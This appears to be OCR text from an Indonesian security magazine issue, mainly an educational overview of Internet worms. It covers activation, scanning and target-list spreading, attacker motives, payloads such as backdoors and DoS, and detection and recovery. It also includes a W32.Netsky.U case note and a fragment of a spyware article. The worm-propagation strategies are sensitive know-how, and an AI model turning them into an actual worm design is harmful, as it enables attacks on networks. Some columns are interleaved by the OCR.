perusahaan banyak mencurahkan              menyerang dan menguasai sistem
perhatiannya pada perlindungan             komputer lain? Sepertinya tidak mung-
jaringan namun sedikit yang mem-           kin, bukan?
berikan perhatian untuk melindungi         Namun tidak menurut Maximilian
salah aset penting mereka yaitu            Dornseif (md.hudora.de), seorang
database. Pada tahun 2005 ini, data-       peneliti dari RWTH Aachen Univer-
base security akan mendapatkan

                                                                                              Vol. IV No. 11 NeoTek       7
                                                                                         NeoStart


                                                           COMPUTER SECURITY
      Autonomous Intrusion Agents
      Internet Worm atau cacing yang dikenal terdapat internet sesungguhnya adalah Autonomous
   Intrusion Agents. Memiliki kemampuan menggandakan diri dengan memanfaatkan Security Flaws.
  Jim Geovedi & Bayu Krisna (jim@corebsd.or.id & krisna@corebsd.or.id) membahasnya untuk
anda demi menambah wawasan mengenai Worm yang saat ini sedang booming menghiasi internet.
        NDA TENTU MASIH INGAT IKLAN DI MEDIA TELEVISI      ngan kondisi tersebut sehingga mereka melakukan teknik
 A       beberapa tahun silam, Anak anda cacingan? Ber-
         hubungan dengan cacing, tulisan ini membahas
                                                           social engineering seperti yang dilakukan oleh virus
                                                           Melissa yang seolah-olah mengirimkan informasi penting
         cacing yang berbeda bentuk. Cacing-cacing di      dari orang yang telah dikenal oleh korban atau pesan-
Internet (Worms) adalah Autonomous Intrusion Agents        pesan personal lainnya yang dikirimkan oleh virus
yang mampu melakukan penggandaan diri dan menyebar         ILOVEYOU. Walaupun Melissa adalah sebuah virus macro
dengan memanfaatkan kelemahan-kelemahan sekuriti           pada program Microsoft Word namun dengan intervensi
(security flaws) pada services yang umum digunakan.        user maka penyebaran Melissa di Internet sempat men-
Worm bukanlah sebuah fenomena baru, ditemukan per-         jadi ancaman yang paling menakutkan.
tama kali penyebarannya pada tahun 1988. Worms telah       Aktivasi terjadwal. Metode aktivasi worm yang lebih ce-
menjadi sebuah ancaman yang mematikan di Internet,         pat adalah dengan menggunakan proses terjadwal pada
walaupun sebagian besar kasus yang terjadi secara spesi-   sistim (scheduled system proces). Ada banyak program
fik adalah pada sistim berbasis Windows. Beberapa jenis    yang berjalan pada lingkungan desktop maupun server
worms terbaru memanfaatkan electronic mail (e-mail)        untuk melakukan proses sesuai dengan jadwal yang dibe-
sebagai medium penyebarannya.                              rikan. Metode ini tetap membutuhkan intervesi manusia
1. Metode Aktivasi dan Mekanisme                           namun kali ini intervensi attacker yang dibutuhkan. Se-
Penyebaran                                                 bagai contoh, program auto-update dari sistim yang me-
                                                           lakukan proses updating ke server vendor. Dengan mela-
Perbedaan mendasar antara worm dan virus terletak pada     kukan update ke remote host sebagai master, seorang
bagaimana mereka membutuhkan intervensi user untuk         attacker yang cerdik dapat memanfaatkan proses tersebut
melakukan penggandaan diri dan menyebar menginfeksi        untuk menyebarkan worm dengan terlebih dahulu me-
sistim komputer. Virus lebih lambat dalam melakukan pe-    nguasai remote host atau gateway pada network maupun
nyebaran jika dibandingkan dengan worm. Namun virus        di Internet dan mengganti atau menginfeksi file yang di-
mempunyai kemampuan lebih untuk menghindari detek-         butuhkan pada proses update dengan kode program worm.
si program-program anti-virus yang berusaha mengiden-
tifikasi dan mengontrol penyebaran virus pada sistim       Aktivasi mandiri. Metode aktivasi mandiri adalah metode
komputer. Namun pada praktek penyebarannya sebuah          tercepat worm dalam menggandakandiri, menyebar, dan
virus dapat menjadi sebuah worm.                           menginfeksi host korban. Metode ini paling populer digu-
                                                           nakan oleh para penulis worm. Umumnya worm yang
Untuk memudahkan pembahasan, kita membatasi termi-         menggunakan metode ini memanfaatkan kelemahan-
nologi antara worm dan virus dengan mempertimbang-         kelemahan sekuriti (security flaws) pada service yang
kan metode aktivasi yang dilakukan oleh sebuah worm,       umum digunakan. Sebagai contoh, worm CodeRed yang
proses yang dilakukan sebuah worm untuk mengeksekusi       mengeksploitasi Webserver IIS. Worm akan menyertakan
pada sebuah sistim komputer dan mekanisme penyeba-         dirinya pada service daemon yang sudah dikuasainya atau
ran, proses yang memungkinkan sebuah worm berkelana        mengeksekusi perintah-perintah lain dengan privilege
dari satu host ke host yang lain.                          yang sama dengan yang digunakan oleh daemon tersebut.
                                                           Proses eksekusi tersebut akan berlangsung ketika worm
1.1. Metode Aktivasi
                                                           menemukan vulnerable service dan melakukan eksploitasi
Pengertian bagaimana worm dapat aktif pada sebuah host     terhadap service tersebut.
berhubungan erat dengan kemampuan worm untuk me-
nyebarkan diri, sejumlah worms dapat diatur untuk aktif    1.2. Mekanisme Penyebaran
secara langsung (activated nearly immediately), sementa-   Worm menginfeksi host korban dan memasukkan kode
ra yang lain dapat menunggu beberapa hari, minggu atau     program sebagai bagian dari program worm ke dalamnya.
bahkan bulan untuk dapat teraktivasi dan kemudian          Kode program tersebut dapat berupa machine code, atau
menyebarkan-dirinya.                                       routine untuk menjalankan program lain yang sudah ada
Aktivasi dengan intervensi user. Merupakan proses akti-    pada host korban. Dalam proses penyebarannya, worm
vasi paling lambat karena membutuhkan intervensi user      harus mencari korban baru dan menginfeksi korban de-
untuk mengeksekusi worm tersebut, disadari maupun          ngan salinan dirinya. Proses pendistribusian tersebut da-
tidak oleh user tersebut. Namun karena sosialisasi yang    pat berlangsung sebagai proses distribusi satuan (dari satu
gencar dilakukan mengenai bahaya worm dan virus, user      host ke host yang lain) atau sebagai proses distribusi ma-
dapat lebih cermat dengan tidak mengeksekusi program       sal (dari satu host ke banyak host). Proses distribusi masal
asing atau membuka attachment e-mail dari orang yang       dipertimbangkan sebagai metode penyebaran tercepat de-
tidak dikenalnya, hal ini tentu akan memperlambat proses   ngan asumsi batasan yang digunakan adalah satuan wak-
aktivasi worm. Tetapi pembuat worm tidak putus asa de-     tu. Terdapat beberapa mekanisme penyebaran yang digu-


                                                                                         Vol. IV No. 11 NeoTek       9
                   NeoStart

nakan worm untuk menemukan calon korban yaitu de-            Monitoring secara Pasif. Worm pasif tidak mencari kor-
ngan melakukan scanning, mencari korban berdasarkan          bannya, namun worm tersebut akan menunggu calon
target list yang sudah dipersiapkan terlebih dahulu oleh     korban potensial dan kemudian menginfeksinya. Walau-
penulis worm atau berdasarkan list yang ditemukan pada       pun metode ini lebih lambat namun worm pasif tidak
sistim korban maupun di metaserver, serta melakukan          menghasilkan Anomalous Traffic Patterns sehingga kebe-
monitoring secara pasif.                                     radaan mereka akan sulit diketahui. Sebagai contoh, anti-
Scanning. Metode scanning melibatkan proses probing          worm CRClean tidak membutuhkan aktivasi user, worm
terhadap sejumlah alamat di Internet dan kemudian            ini menunggu serangan worm CodeRed dan turunannya,
mengidentifikasi host yang vulnerable. Dua format seder-     kemudian melakukan respon dengan melakukan counter-
hana dari metode scanning adalah sequential (mencoba         attack. Jika proses counter-attack berhasil, CRClean akan
mengidentifikasi sebuah blok alamat dari awal sampai         menghapus CodeRed dan menginfeksi korban dengan
akhir) dan random (secara acak).                             menginstal dirinya pada mesin. Sehingga CRClean dapat
                                                             menyebar tanpa melakukan proses scanning.
Penyebaran worm dengan metode scanning baik sequen-
tial maupun random, secara komparatif dapat dikatakan        2. Motivasi dan Muatan
lambat, namun jika dikombinasikan dengan aktivasi se-
cara otomatis, worm dapat menyebar lebih cepat lagi.         2.1. Motivasi Serangan
Worm yang menggunakan metode scanning biasanya               Walaupun sangat penting untuk mengetahui teknologi
mengeksploitasi security holes yang sudah teridentifikasi    yang digunakan oleh Internet worms, namun untuk dapat
sebelumnya sehingga secara relatif hanya akan mengin-        memahami ancaman yang berasal dari sebuah worm seca-
feksi sejumlah host saja.                                    ra alami perlu dipahami motivasi dari intruders (seperti
Metode scanning lainnya yang dinilai cukup efektif ada-      penulis worm), serta jika memungkinkan dapat meng-
lah dengan menggunakan bandwidth-limited routine (se-        identifikasi siapa sebenarnya intruder tersebut. Ada ba-
perti yang digunakan oleh CodeRed, yaitu dengan mem-         nyak motivasi yang menyebabkan sebuah worm dibuat
batasi target dengan latensi koneksi dari sistim yang su-    namun berikut ini adalah motivasi umum yang menda-
dah terinfeksi dengan calon korban yang baru), mendefi-      sari serangan worm.
nisikan target yang hanya terdapat pada local address (se-   Pride and Power. Intruder (juga pembuat worm) termoti-
perti dalam sebuah LAN maupun WAN), dan permutasi            vasi untuk mendapatkan kekuasaan dan show-off penge-
pada proses pencarian.                                       tahuan mereka dengan merusak host orang lain. Intruders
Scanning yang dilakukan worm tidaklah spesifik terhadap      ini umumnya tidak terorganisir dengan baik dan mene-
aplikasi sehingga attacker dapat menambahkan sebuah          mukan targetnya secara random. Jika mereka menemukan
exploit baru pada sebuah worm yang sudah dikenal. Seba-      sebuah sistim yang lemah dan vulnerable terhadap se-
gai contoh, worm Slapper mendapatkan muatan exploit          buah attack maka mereka akan melangsungkan attack
baru dan menjadikannya sebuah worm baru yaitu Scalper.       pada sistim tersebut.
Secara umum, kecepatan scanning yang dilakukan adalah        Keuntungan Komersial. Berkaitan dengan perkembangan
terbatas pada kombinasi faktor seperti; jumlah mesin-        dunia ekonomi yang semakin hari semakin bergantung
mesin yang vulnerable, desain dari scanner, dan kemam-       pada kinerja komputer untuk menjalankan operasional
puan network monitoring system yang mampu meng-              bisnis sehari-hari, serangan elektronik yang ditujukan ke
identifikasikan keberadaan worm dengan meningkatnya          sebuah domain dapat secara serius menganggu transaksi
trafik yang cukup signifikan.                                yang sedang berlangsung. Sebuah serangan worm dapat
                                                             dilakukan untuk mendapatkan profit dengan melakukan
Target Lists. Sebuah worm dapat memiliki target list yang    manipulasi finansial atau membatasi ruang-gerak
sudah ditentukan sebelumnya oleh penulis worm terse-         kompetitor.
but. Dengan target list yang sudah ditentukan terlebih
dahulu membuat sebuah worm lebih cepat dalam menye-          Pemerasan. Karena sebuah worm dapat dibuat untuk me-
bar, namun tentu saja penyebaran tersebut akan sangat        langsungkan serangan DOS (Denial of Service) tanpa
terbatas karena target berdasarkan sejumlah alamat di In-    henti, pemerasan terhadap sebuah perusahaan dapat
ternet yang sudah ditentukan.                                dilakukan dan serangan baru dapat dihentikan jika terjadi
                                                             transaksi pembayaran sesuai yang diinginkan oleh
Selain itu, worm dapat menemukan list yang dibutuhkan        attacker. Motivasi ini lebih terorganisi secara individual
pada host korban yang sudah dikuasainya, list ini umum-      maupun kelompok.
nya digunakan oleh worm yang metode penyebarannya
berdasarkan topologi network. Informasi yang didapat         Protes. Seseorang yang memiliki pengetahuan yang
contohnya adalah IP address sistim tersebut dan worm         cukup untuk menulis sebuah worm dapat melangsungkan
mengembangkannya menjadi sebuah subnet pada LAN              serangan jika ia merasa dirugikan oleh suatu pihak ter -
atau WAN.                                                    tentu. Ia melakukan protes terselubung dengan menye-
                                                             barkan worm di Internet. Protes tersebut juga dapat ber-
Target list juga dapat diperoleh pada metaserver (server     dampak negatif pada institusi yang menjadi target, seperti
yang memberikan informasi sejumlah server yang memi-         SCO dan Microsoft yang baru-baru ini mendapatkan se-
liki service yang sama). Sebagai contoh, metaserver          rangan DOS yang ditujukan kepadanya. Protes politik
Gamespy memiliki daftar server yang menyediakan              juga dapat menjadi muatan dari serangan worm. Sebagai
service game online. Sebuah worm yang memanfaatkan           contoh, worm Yaha Mail dibuat sebagai tool dari protes
metaserver akan melakukan query terlebih dahulu untuk        politik yang diklaim sebagai pro India dan melakukan
mengetahui keberadaan target yang baru. Metode ini juga      serangan DOS pada websites milik pemerintah Pakistan.
dapat mempercepat proses penyebaran sebuah worm yang
menyerang webserver, worm dapat menggunakan Google           Terorisme. Secara obyektif, worm dapat dimanfaatkan
atau mesin pencari lainnya sebagai metaserver untuk          oleh kelompok teroris. Oleh karena ada banyak sistim
menemukan target.                                            komputer yang terhubungkan ke Internet berlokasi di

10   NeoTek Vol. IV No. 11
                                                                                          NeoStart

negara-negara maju, maka sebuah serangan worm dapat         3. Mendeteksi Internet Worms
ditujukan sebagai bentuk terorisme. Attacker dapat me-
                                                            Sebuah firewall telah dikembangkan sebagai alat untuk
nyertakan muatan teror Al-Qaeda atau kelompok-kelompok
                                                            mendeteksi anomali traffic yang berasal dari Internet dan
anti-globalisasi lainnya untuk menyerang.
                                                            menghasilkan logfile yang memberikan peringatan bahwa
2.2. Muatan (Payload)                                       worm menyerang dengan sebuah port tertentu sebagai
                                                            target. Firewall dapat melakukan blocking akses sampai
Berkaitan dengan motivasi penyebaran, muatan yang ada       administrator melakukan analisis dan recovery jika
pada sebuah worm dapat beragam. Berikut ini adalah mu-      diperlukan.
atan yang sering ditemukan pada worm.
                                                            Masalah yang umum ditemukan dalam melakukan res-
Tanpa muatan atau non-fungsional. Sebuah worm yang          pon otomatis secara akurat adalah mendeteksi dan me-
memiliki bug pada kode program yang berhubungan me-         nganalisa sebuah worm yang sedang beroperasi dan
tode penyebaran biasanya gagal untuk menyebar, namun        menginfeksi ke sebuah network. Bagian ini mendiskusi-
worm yang memiliki bug pada muatannya tetap dapat           kan strategi-strategi yang telah eksis maupun baru dalam
menyebar dan menimbulkan efek serius seperti pening-        mendeteksi keberadaan sebuah worm.
katan network traffic atau secara aktif melakukan identi-
fikasi host yang vulnerable.                                Detektor dapat berupa sebuah komputer atau device lain
                                                            yang berdiri sendiri, terletak pada DMZ (De-Militarized
Backdoor. Worm CodeRed II membuat sebuah backdoor           Zone), atau pada sebuah backbone, yang memiliki ke-
pada host korban yang memungkinkan semua orang da-          mampuan mendeteksi secara lokal atau terpusat. Apapun
pat mengeksekusi program pada korban dari sebuah            detektor yang digunakan haruslah sensitif dalam skala
browser. Hal tersebut juga memicu peningkatan serangan      network yang besar untuk mengurangi false positives dan
worm anti-CodeRed yang berusaha mengeksploitasi back-       false negatives. Detektor dapat dikatakan berhasil jika
door tersebut.                                              mampu mendeteksi kejadian anomali dari beberapa tipe
Remote DOS. Muatan umum dari worm adalah kemam-             worm, kejadian anomali tersebut dapat diketahui dari pola
puan untuk melakukan serangan DoS (Denial of Service).      trafik yang dihasilkan sebagai konsekuensi dari teknik
Worm tersebut memiliki tool yang dapat melakukan se-        penyebaran worm tersebut.
rangan terhadap sebuah target yang sudah ditentukan atau
tergantung pada komando seseorang yang membuatnya           3.1 Deteksi pada Host
mampu melakukan serangan DDoS (Distributed Denial of        Host detection. Program peer-to-peer maupun protokol
Service).                                                   Windows sharing dapat digunakan sebagai medium pe-
Melakukan update. Sejumlah worm terdahulu seperti           nyebaran worm, akibatnya mekanisme query worm sama
W32/Sonice memiliki muatan untuk melakukan update.          seperti yang dihasilkan oleh program peer-to-peer biasa.
W32/Sonice melakukan proses query terhadap sejumlah         Hal tersebut menyebabkan proses deteksi pada network-
website untuk mendapatkan kode program yang baru ba-        level akan mengalami kesulitan kecuali implementasi IDS
gi dirinya. Kemampuan ini dapat digunakan oleh DDoS         dilakukan untuk mengenali pola-pola tersebut. Dalam im-
tool untuk melakukan update pada program-program            plementasinya, IDS akan menganalisa pola-pola tertentu
yang menjadi zombie. Jika kontrol untuk melakukan up-       pada trafik berdasarkan signature database yang dimilikinya.
date masih terus berlangsung maka sebuah modul exploit      Anti-virus Behavior Blocking. Behavior blocking adalah
dapat disertakan sehingga menjadikan worm tersebut          teknik yang digunakan antivirus dalam menghentikan
mampu menyebar lebih cepat dan mendapatkan korban           program-program jahat dalam melakukan aksinya. Wa-
lebih banyak lagi.                                          laupun dinilai sebagai upaya yang berhasil, teknik ini ti-
Spionase dan Pengumpulan Data. Worm dapat dilakukan         dak diberdayakan secara luas karena faktor usability dan
sebagai alat untuk melakukan spionasi dan pengumpulan       false positives.
data dengan mencari keyword tertentu seperti nomor kar-     Wormholes dan Honeyfarms. Sebuah honeypot adalah
tu kredit atau informasi penting lainnya pada dokumen-      sebuah host yang ditujukan untuk dikuasai oleh intruder
dokumen yang tersimpan pada host yang sudah menjadi         dalam upaya mendeteksi dan menganalisa perilaku intru-
korban.                                                     der. Honeypot yang didistribusikan pada sebuah network
Pengerusakan Data. Ada banyak virus dan worm yang           (honeynet) dapat membentuk detektor yang akurat ke-
melakukan pengerusakan data seperti Chernobyl dan           cuali faktor harga (terutama hardware dan admistration
Klez, yang memiliki perintah-perintah penghapusan data.     costs) menjadi faktor penghalang diimplementasikannya
Karena worm dapat menyebar dengan cepat, mereka             honeynet.
dapat mulai menghapus atau memanipulasi data dari awal      Sebagai contoh implementasi honeypot yang hemat ada-
proses infeksi.                                             lah dengan membuat sebuah honeypot system pada net-
Pengerusakan Hardware. Walaupun sebagian besar BIOS         work yang terpisah dari workstations atau server dan me-
memiliki kemampuan untuk mencegah proses reflashing,        lakukan traffic redirection pada port-port tertentu, yang
beberapa worm memiliki routine yang mampu melaku-           diduga sebagai trafik yang digunakan oleh worm untuk
kan pengerusakan terhadap BIOS jenis tertentu.              menyebar, ke honeypot tersebut. Sebuah honeypot dapat
                                                            menggunakan teknologi virtual machine untuk membuat
Coercion. Dengan muatan yang coercive, sebuah worm          image dari banyak sistim yang vulnerable.
tidak menimbukan kerusakan kecuali jika worm tersebut
diganggu. Seperti worm yang memberikan pilihan pada         3.2. Deteksi pada Network
user, mengijinkan worm tersebut tinggal pada sistim dan     Deteksi pada LAN atau WAN. Sebuah mesin yang terin-
tidak melakukan pengerusakan, atau menghapus worm           feksi oleh worm akan menghasilkan trafik scanning yang
tersebut namun menimbulkan efek yang buruk dengan           dapat dideteksi. Proses deteksi dapat dilakukan pada gate-
kerusakan pada sistim.                                      way atau IDS yang diletakkan diantara gateway dan LAN

                                                                                          Vol. IV No. 11 NeoTek      11
                   NeoStart

atau WAN.                                                      keterbatasannya untuk memperbaiki kerusakan yang di-
Deteksi pada level ISP atau Backbone. Telah diketahui          timbulkan oleh satu jenis worm saja.
bahwa untuk menyebarkan dirinya sebuah umumnya                 Sekurang-kurangnya terdapat 3 (tiga) jenis anti-worm
worm melakukan proses scanning terlebih dahulu untuk           yang pernah ada di Internet:
menemukan target yang baru. Meningkatnya network               ?   Cheese worm, yang menyebar dengan menggunakan
traffic ISP atau backbone secara dramatis dapat mengin-            backdoor yang dibuat oleh 1ion worm.
dikasikan bahwa worm telah menyerang network
tersebut.                                                      ?   Code Green, yang memanfaatkan hole yang dibuat
                                                                   oleh CodeRed II.
4. Respon dan Recovery                                         ?  CRClean yang memberikan respon terhadap serangan
4.1. Respon                                                       CodeRed II.
Malware seperti worm dan virus dapat menyebar lebih            Distribution patch dan update. Metode recovery dengan
cepat dari pada kemampuan manusia untuk menganalisa            mendistribusikan patch update untuk program-program
dan meresponinya. Sebuah strategi pertahanan yang baik         yang vulnerable pada sebuah sistim komputer dinilai se-
menghadapi worm haruslah dapat dilakukan secara oto-           bagai metode yang efektif. Proses distribusi dapat dilaku-
matis. Sebuah respon otomatis dapat memperlambat dan           kan oleh vendor software maupun adminstrator yang me-
membatasi ruang-gerak worm.                                    nangani sejumlah besar host pada LAN atau WAN.
Respon otomatis yang diberikan biasanya berupa blocking        Salah satu kekurangan metode ini adalah ketika intruder
terhadap aktifitas worm. Kelemahan respon otomatis             dapat menggunakan worm untuk menguasai sejumlah
yang umum adalah terjadinya respon terhadap false posi-        besar host dan melakukan DOS ke host lain yang akan
tive dan false negative. False positive adalah situasi dima-   melakukan respon terhadap serangan worm tersebut. Tar-
na respon diberikan namun tidak terjadi indikasi adanya        get dari DOS biasanya adalah vendor dari program-
worm, sementara false negative adalah situasi dimana worm      program yang vulnerable dan dimanfaatkan oleh worm.
benar-benar menyerang namun respon tidak diberikan.
                                                               5. Kesimpulan
Keputusan untuk menanggapi keberadaan worm pada
network haruslah bijak. Berarti dalam pengambilan se-          Sebagai autonomous intrusion agents, Internet worms
buah keputusan tersebut haruslah berdasarkan analisa           merupakan ancaman bagi network dalam skala kecil mau-
teknis yang melibatkan banyak aspek seperti statistik,         pun besar. Setelah diketahui bagaimana metode umum
usage policy, maupun security advisory.                        penyebaran, mekanisme, motivasi dibuatnya sebuah worm,
                                                               dan deteksi keberadaan worm pada sebuah host maupun
Host Response. Sebuah proses respon pada sistim kompu-         network, maka perlu penanganan secara serius dalam me-
ter akan melibatkan personal firewall yang mampu mem-          nanggulangi wabah Internet worms. Bagaimana mengan-
baca alerts yang dihasilkan oleh host-based IDS. Pada le-      tisipasi serangan worm saat ini maupun dimasa menda-
vel ini, respon yang diberikan dapat menjadi lebih efektif     tang yang lebih beragam menjadi sebuah pekerjaan ru-
dalam membendung aktifitas worm.                               mah baru yang tidak mudah. Perlu kerjasama berbagai
Network Response. Respon pada level ini haruslah               pihak terkait seperti penyelenggara jasa layanan akses
memungkinkan untuk mengkombinasikan teknik                     Internet agar tidak terjadi dampak yang lebih buruk.
blocking ketika mendapat alert dan mampu memilah kelas
dari trafik yang diduga sebagai worm yang sedang
                                                               6. Referensi
menyebar. Network-based IDS seperti snort dan prelude          1. Vern Paxson, Stuart Staniford, and Nicholas Weaver,
dapat digunakan untuk mengidentifikasi keberadaan              How to 0wn the Internet in Your Spare Time, Proceedings
worm dengan menganalisa network traffic secara pasif.          of the 11th USENIX Security Symposium (Security '02),
ISP Response. Walaupun tingkat kesulitan dalam melaku-         2002.
kan respon otomatis pada level ini cukup tinggi, namun         2. David Moore, Colleen Shannon, Geoffrey Voelker and
proteksi dengan skala sistim yang lebih besar dapat men-       Stefan Savage, Internet Quarantine: Requirements for
jadi pertimbangan. Implementasi respon otomatis pada le-       Containing Self-Propagating Code, Proceedings of the
vel ISP haruslah terlebih dahulu teruji dengan baik            2003 IEEE Infocom Conference, San Francisco, CA, April
karena terjadinya false positive dan false negative dapat      2003.
dengan mudah terjadi.                                          3. Jose Nazario, The Future of Internet Worms, Blackhat
4.2. Recovery                                                  Briefings, July 2001.
Proses recovery dipertimbangkan sebagai salah satu upaya       4. CERT, CERT Advisory CA-2000-04 Love Letter Worm,
untuk memperlambat penyebaran worm. Dengan memu-               http://www.cert.org/advisories/CA-2000-04.html.
lihkan kondisi sistim yang terinfeksi setidaknya akan me-      5. Arno Wagner, Thomas Dübendorfer, Bernhard Plattner,
ngurangi sebuah penyebaran baru dari worm. Beberapa            Roman Hiestand, Experiences with Worm Propagation
metode berikut adalah upaya dalam melakukan recovery           Simulations, ACM Workshop on Rapid Malcode
terhadap serangan worm.                                        (WORM) 2003, November 2003.
Anti-worms. Walaupun bersifat ilegal dan kurang praktis,       6. Nicholas C Weaver, Warhol Worms: The Potential for
sebuah anti-worm atau worm putih dapat menutupi secu-          Very Fast Internet Plagues,
rity holes dan membatasi ruang-gerak worm jenis lain.          http://www.cs.berkeley.edu/~nweaver/warhol.html.
Terlihat sangat atraktif namun beberapa batasan signifi-
                                                               7. Eugene H. Spafford, The Internet Worm Program: An
kan membuatnya bersifat tidak praktis, selain itu faktor
                                                               Analysis, ACM SIGCOMM Computer Communication
hukum membuat anti-worm tidak dibenarkan secara
                                                               Review, 19(1):17--59, January 1989.
hukum. Batasan yang signifikan dari anti-worm adalah

12   NeoTek Vol. IV No. 11
                                                                                                NeoStart

8. Paul Boutin, The Fix Is In – Programmers can stop
Internet worms. Will they?,
http://slate.msn.com/id/2081943/
9. Symantec, Security Response,
http://securityresponse.symantec.com/
10. Networm.org, The Worm Information Center,
http://www.networm.org/

7. Tambahan
7.1. W32.Netsky.U
W32.Netsky merupakan sebuah worm yang menganda-               Gambar 1. Lonjakan Network Traffic; penyebaran worm yang
kan dirinya melalui e-mail yang dikirimkan secara masal.      menginfeksi sejumlah besar klien dial-up dan wireless.
Memiliki banyak varian, sampai tulisan ini dibuat varian
terbaru worm W32.Netsky adalah W32.Netsky.U@mm                Ketika worm sedang aktif untuk melakukan scanning
(juga dikenal sebagai W32/Netsky.u@MM, W32/Netsky-            atau mengirimkan e-mail secara massal, terjadi lonjakan
U, WORM_NETSKY.U, Win32.Netsky.U). Menginfeksi                network traffic yang cukup drastis mencapai 90 Mbps.
sistim operasi Windows 2000, Windows 95, Windows 98,
Windows Me, Windows NT, dan Windows XP.
Muatan worm W32.Netsky.U adalah melakukan DoS ke
sejumlah website pada tanggal 14 April 2004 sampai 23
April 2004, selain itu worm ini akan mengirimkan banyak
e-mail ke alamat yang diperoleh pada file yang terdapat
pada host korban.
W32.Netsky juga menginstal sebuah backdoor yang me-
mungkinkan seseorang dapat login ke dalam sistim tanpa
melewati proses otentifikasi yang semestinya.
Setelah berhasil mengeksploitasi host korban, W32.Netsky.U
akan menyalinkan diri sebagai %Windir%\SymAV.exe              Gambar 2. Lonjakan Network Traffic; worm melakukan scanning atau
(%Windir% merupakan variable dimana lokasi instalasi          mengirimkan e-mail secara massal.
default Windows berada). Selanjutnya worm tersebut
akan melakukan serangkaian perintah seperti membuat
                                                              8. Kredit
mutex, membuat sebuah file MIME-encoded, dan me-
nambahkan sebuah entry pada registry Windows.                 Michael S. Sunggiardi dan Team BoNET, Judith MS,
Worm W32.Netsky.U menginstal sebuah backdoor yang             Hengky Anwar, Stephen Chen, Syam A. Yanuar,
mendengarkan port TCP 6789 yang memungkinkan orang            Y. Fery Wibowo, Chiank, Dominick Dreiser, Reza
lain untuk mengirimkan executable file dan kemudian           Muhammad, Randi Malikul Mulki, Arif Wicaksono,
secara otomatis mengeksekusinya.                              Indra Kusuma, D. Wangsa Sunarya.

Pada tanggal 14 April 2004 sampai 23 April 2004, worm
akan melakukan serangan DoS ke sejumlah website se-
perti: www.cracks.am, www.emule.de, www.kazaa.com,
www.freemule.net, dan www.keygen.us.
Untuk menyebarkan dirinya, worm W32.Netsky.U akan
melakukan pencarian sejumlah file seperti file yang ber-
ekstensi .asp, .cgi, .html, .php, dan lain-lain guna menda-
patkan daftar alamat e-mail yang nantikan akan dikirimi
salinan worm tersebut. Dengan ukuran attachment sebe-
sar 18,432 bytes dan target yang banyak, network yang
terkena worm ini dapat dipastikan akan mengalami gang-
guan dengan terjadinya lonjakan trafik pada transmisi e-
mail.
Informasi detail mengenai W32.Netsky.U serta bagaima-
na cara mengatasinya dapat dilihat pada website Symantec,
www.symantec.com/avcenter/venc/data/w32.netsky.u@mm.html
7.2. Lonjakan Network Traffic
Selama bulan Februari sampai Maret 2004, network              CoreBSD Digital Research Group adalah sekelompok anak muda yang
PT. BoNET Utama (salah satu subnet ISP IndoNET yang           tertarik pada bidang computer security dan sistim operasi komputer
berlokasi di Bogor), telah terjadi serangkaian gangguan       *BSD. Kelompok yang tidak pernah mendeklarasikan secara resmi
pada network akibat penyebaran worm yang menginfeksi          kapan berdirinya, berkumpul pada sebuah ruang chat #corebsd di IRC
sejumlah besar klien dial-up dan wireless.                    server Efnet. Informasi lengkap mengenai kelompok CoreBSD dapat
Umumnya, POP (Point of Presence) Bonet Pajajaran setiap       dilihat pada website http://corebsd.or.id/
harinya mendistribusikan traffik dengan rata-rata 750 kbps.

                                                                                               Vol. IV No. 11 NeoTek         13
                    NeoStart


                                                               COMPUTER SECURITY
                                                                                   Scumware
Berselancar di Internet yang biasa kita lakukan sehari-hari, ternyata tidak terlepas dari hal-hal yang
    dapat mengganggu kenyamanan bahkan yang terburuk yaitu merusak privacy. Andi Ismayadi
     (fuzk3_kendi@yahoo.com) membeberkan hal yang mungkin akan kita temui nantinya ketika
                                     berselancar di internet seperti spyware dan lain sebagainya.

    A
          PABILA KITA SEDANG BERSELANCAR DI INTERNET MA -      files\common files\GMT\ dan di C:\Windows\Start
         ka kita akan menemui hal-hal yang baru, mulai         Menu\Programs\StartUp\ sedangkan file Cmiie bisa ditemu-
         dari perkembangan teknologi internet itu sendiri      kan di C:\program files\Common Files\. Anda bisa menghapus
sampai perkembangan software. Namun pernakah ketika            file-file bawaan gator tersebut, namun untuk menghapus
anda berkunjung ke sebuah WebShopping untuk melihat-           registry keynya anda sebaiknya mem-back up terlebih
lihat produk dan info yang sedang anda cari? Tiba-tiba         dahulu sebelumnya agar terhindar dari masalah.
muncul pop-up menu yang menginformasikan untuk                 Selanjutnya non-aktifkan startup Gator di MSconfig-
menginstal sebuah program baru untuk mengawasi kinerja         Startup lalu cari GAIN ataupun Gator, dan hilangkan
PC anda. Tetapi setelah di-install malah lebih banyak meng-    tanda centangnya.
ganggu kegiatan berselancar anda.
Kejadian di atas mungkin sering kita alami, bahasan kali
ini akan menjelaskan apa itu scumware? Scumware adalah
sebuah sebutan untuk tool penggangu seperti yang telah
disebutkan sebelumnya di atas. Scumware sendiri terdiri
dari spyware, adware, sneakware, dan scamware.
Spyware adalah sebuah program kecil yang memiliki ke-
mampuan layaknya seperti mata-mata dengan merekam
aktivitas berselancar anda di internet dan lain sebagainya,
kemudian tool ini akan menyimpan rekaman tersebut dan
mengirimkannya ke si pembuat tool ini. Mirip dengan
keylogger dan trojan.
                                                               Gambar 1. MSconfig-Startup
Adware mungkin sudah tidak jarang lagi ditemukan bah-
kan hampir setiap kali tersambung ke internet program          Hilangkan Scumware Dengan NoAdware
ini akan selalu menawarkan jasa-jasanya dalam bentuk           Apabila anda ragu dengan cara konvensional seperti di atas
gambar atau bentuk lainnya, dan juga bisa memata-matai         maka banyak sekali tools-tools untuk menghilangkan
seperti spyware.                                               scumware. Namun untuk memilih yang benar-benar meng-
Spamware juga bersifat sama seperti adware. Semua tool         hilangkan memang sukar, karena terkadang program anti
di atas merupakan kerjaan dari sebuah perusahaan dengan        adwarenya sendiri telah terjangkiti scumware.
cara mengiklankan produk mereka secara massal dan main         Ketika browse untuk mencari referensi tentang scumware
hantam kromo semua pengguna internet.                          saya mendapatkan referensi tentang tool-tool anti scumware
Bagaimana anda bisa terinfeksi scumware? Seperti di awal       dan salah satunya adalah NoAdware. Ketika saya coba di
pembahasan, tergiur akan tawaran program gratis untuk di       rumah, program ini berguna untuk melakukan scanning
instal di PC anda, tanpa disadari jika anda mengikuti ta-      PC dari ware-ware yang tidak berguna. Silahkan anda
waran itu adalah sebuah keputusan yang salah. Salah satu       mendownloadnya di www.noadware.net.
dari scumware ada Gator/GAIN, dimana gator merupakan
sebuah spyware yang paling dibenci pengguna internet.
Gator memiliki beberapa komponen didalamnya antara
